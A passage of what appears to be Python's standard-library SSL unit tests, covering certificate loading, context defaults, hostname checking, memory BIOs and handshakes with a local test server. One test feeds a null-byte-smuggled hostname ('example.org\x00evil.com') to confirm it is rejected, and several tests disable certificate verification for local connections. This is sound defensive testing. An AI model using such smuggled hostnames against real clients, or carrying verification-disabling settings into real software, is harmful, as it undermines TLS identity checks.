ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
